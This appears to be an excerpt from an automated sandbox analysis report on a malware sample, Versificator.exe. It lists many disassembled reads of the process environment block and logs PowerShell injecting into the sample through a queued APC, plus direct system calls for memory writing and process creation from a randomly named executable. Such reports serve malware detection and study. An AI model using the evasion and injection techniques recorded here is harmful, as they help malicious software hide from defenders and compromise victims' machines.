            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21304500 mov eax, dword ptr fs:[00000030h]11_2_21304500
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21304500 mov eax, dword ptr fs:[00000030h]11_2_21304500
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21304500 mov eax, dword ptr fs:[00000030h]11_2_21304500
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21304500 mov eax, dword ptr fs:[00000030h]11_2_21304500
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21304500 mov eax, dword ptr fs:[00000030h]11_2_21304500
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126656A mov eax, dword ptr fs:[00000030h]11_2_2126656A
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126656A mov eax, dword ptr fs:[00000030h]11_2_2126656A
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126656A mov eax, dword ptr fs:[00000030h]11_2_2126656A
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21238550 mov eax, dword ptr fs:[00000030h]11_2_21238550
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21238550 mov eax, dword ptr fs:[00000030h]11_2_21238550
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B05A7 mov eax, dword ptr fs:[00000030h]11_2_212B05A7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B05A7 mov eax, dword ptr fs:[00000030h]11_2_212B05A7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B05A7 mov eax, dword ptr fs:[00000030h]11_2_212B05A7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212545B1 mov eax, dword ptr fs:[00000030h]11_2_212545B1
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212545B1 mov eax, dword ptr fs:[00000030h]11_2_212545B1
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21232582 mov eax, dword ptr fs:[00000030h]11_2_21232582
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21232582 mov ecx, dword ptr fs:[00000030h]11_2_21232582
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21264588 mov eax, dword ptr fs:[00000030h]11_2_21264588
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E59C mov eax, dword ptr fs:[00000030h]11_2_2126E59C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E5E7 mov eax, dword ptr fs:[00000030h]11_2_2125E5E7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E5E7 mov eax, dword ptr fs:[00000030h]11_2_2125E5E7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E5E7 mov eax, dword ptr fs:[00000030h]11_2_2125E5E7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E5E7 mov eax, dword ptr fs:[00000030h]11_2_2125E5E7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E5E7 mov eax, dword ptr fs:[00000030h]11_2_2125E5E7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E5E7 mov eax, dword ptr fs:[00000030h]11_2_2125E5E7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E5E7 mov eax, dword ptr fs:[00000030h]11_2_2125E5E7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E5E7 mov eax, dword ptr fs:[00000030h]11_2_2125E5E7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212325E0 mov eax, dword ptr fs:[00000030h]11_2_212325E0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126C5ED mov eax, dword ptr fs:[00000030h]11_2_2126C5ED
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126C5ED mov eax, dword ptr fs:[00000030h]11_2_2126C5ED
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E5CF mov eax, dword ptr fs:[00000030h]11_2_2126E5CF
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E5CF mov eax, dword ptr fs:[00000030h]11_2_2126E5CF
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212365D0 mov eax, dword ptr fs:[00000030h]11_2_212365D0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126A5D0 mov eax, dword ptr fs:[00000030h]11_2_2126A5D0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126A5D0 mov eax, dword ptr fs:[00000030h]11_2_2126A5D0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122E420 mov eax, dword ptr fs:[00000030h]11_2_2122E420
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122E420 mov eax, dword ptr fs:[00000030h]11_2_2122E420
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122E420 mov eax, dword ptr fs:[00000030h]11_2_2122E420
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122C427 mov eax, dword ptr fs:[00000030h]11_2_2122C427
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B6420 mov eax, dword ptr fs:[00000030h]11_2_212B6420
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B6420 mov eax, dword ptr fs:[00000030h]11_2_212B6420
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B6420 mov eax, dword ptr fs:[00000030h]11_2_212B6420
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B6420 mov eax, dword ptr fs:[00000030h]11_2_212B6420
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B6420 mov eax, dword ptr fs:[00000030h]11_2_212B6420
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B6420 mov eax, dword ptr fs:[00000030h]11_2_212B6420
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B6420 mov eax, dword ptr fs:[00000030h]11_2_212B6420
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126A430 mov eax, dword ptr fs:[00000030h]11_2_2126A430
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21268402 mov eax, dword ptr fs:[00000030h]11_2_21268402
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21268402 mov eax, dword ptr fs:[00000030h]11_2_21268402
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21268402 mov eax, dword ptr fs:[00000030h]11_2_21268402
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212BC460 mov ecx, dword ptr fs:[00000030h]11_2_212BC460
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125A470 mov eax, dword ptr fs:[00000030h]11_2_2125A470
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125A470 mov eax, dword ptr fs:[00000030h]11_2_2125A470
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125A470 mov eax, dword ptr fs:[00000030h]11_2_2125A470
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E443 mov eax, dword ptr fs:[00000030h]11_2_2126E443
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E443 mov eax, dword ptr fs:[00000030h]11_2_2126E443
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E443 mov eax, dword ptr fs:[00000030h]11_2_2126E443
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E443 mov eax, dword ptr fs:[00000030h]11_2_2126E443
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E443 mov eax, dword ptr fs:[00000030h]11_2_2126E443
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E443 mov eax, dword ptr fs:[00000030h]11_2_2126E443
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2126E443  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212EA456  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2125245A  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212364AB  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212644B0  mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212BA4B0  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212EA49A  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212304E5  mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2126C720  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2126273C  mov eax, dword ptr fs:[00000030h]; mov ecx, dword ptr fs:[00000030h]; mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212AC730  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2126C700  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21230710  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21260710  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21238770  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21240770  mov eax, dword ptr fs:[00000030h] (x12)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2126674D  mov esi, dword ptr fs:[00000030h]; mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21230750  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212BE75D  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21272750  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212B4755  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212307AF  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212E47A0  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212D678E  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212527ED  mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212BE7E1  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212347FB  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2123C7C0  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212B07C3  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2124E627  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21266620  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21268620  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2123262C  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212AE609  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2124260B  mov eax, dword ptr fs:[00000030h] (x7)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21272619  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212F866E  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2126A660  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21262674  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2124C640  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2126C6A6  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212666B0  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21234690  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212AE6F2  mov eax, dword ptr fs:[00000030h] (x4)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212B06F1  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2126A6C7  mov ebx, dword ptr fs:[00000030h]; mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212B892A  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212C892B  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212AE908  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212BC912  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21228918  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21256962  mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2127096E  mov eax, dword ptr fs:[00000030h]; mov edx, dword ptr fs:[00000030h]; mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212D4978  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212BC97C  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212B0946  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21304940  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212429A0  mov eax, dword ptr fs:[00000030h] (x13)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212309AD  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212B89B3  mov esi, dword ptr fs:[00000030h]; mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212BE9E0  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212629F9  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212C69C0  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2123A9D0  mov eax, dword ptr fs:[00000030h] (x6)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212649D0  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212FA9D3  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21252835  mov eax, dword ptr fs:[00000030h] (x3); mov ecx, dword ptr fs:[00000030h]; mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2126A830  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212D483A  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212BC810  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212BE872  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212C6870  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21242840  mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21260854  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21234859  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21230887  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212BC89D  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212FA8E4  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2126C8F9  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2125E8C0  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_213008C0  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2125EB20  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212F8B28  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21304B00  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212AEB1D  mov eax, dword ptr fs:[00000030h] (x9)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2122CB7E  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212E4B4B  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21302B57  mov eax, dword ptr fs:[00000030h] (x4)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212C6B40  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212FAB40  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212D8B42  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21228B50  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212DEB50  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21240BBE  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212E4BB0  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21238BF0  mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2125EBFC  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212BCBF0  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21250BCB  mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21230BCD  mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212DEBD0  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2126CA24  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2125EA2E  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21254A35  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2126CA38  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212BCA11  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2126CA6F  mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212DEA60  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_212ACA72  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21236A50  mov eax, dword ptr fs:[00000030h] (x7)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21240A5B  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21238AA0  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21286AA4  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2123EA80  mov eax, dword ptr fs:[00000030h] (x9)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21304A80  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21268A90  mov edx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_2126AAEE  mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21286ACC  mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21230AD0  mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe  Code function: 11_2_21264AD0  mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Versificator.exe
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtQueryVolumeInformationFile: Direct from: 0x776D2F2C
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtQuerySystemInformation: Direct from: 0x776D48CC
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtAllocateVirtualMemory: Direct from: 0x776D48EC
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtOpenSection: Direct from: 0x776D2E0C
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtAllocateVirtualMemory: Direct from: 0x776D2BEC
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtQueryInformationProcess: Direct from: 0x776D2C26
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtResumeThread: Direct from: 0x776D2FBC
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtWriteVirtualMemory: Direct from: 0x776D490C
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtCreateUserProcess: Direct from: 0x776D371C
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtClose: Direct from: 0x776D2B6C
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtAllocateVirtualMemory: Direct from: 0x776D3C9C
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtSetInformationThread: Direct from: 0x776C63F9
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtQueryAttributesFile: Direct from: 0x776D2E6C
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtReadVirtualMemory: Direct from: 0x776D2E8C
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtResumeThread: Direct from: 0x776D36AC
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtMapViewOfSection: Direct from: 0x776D2D1C
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | NtWriteVirtualMemory: Direct from: 0x776D2E3C
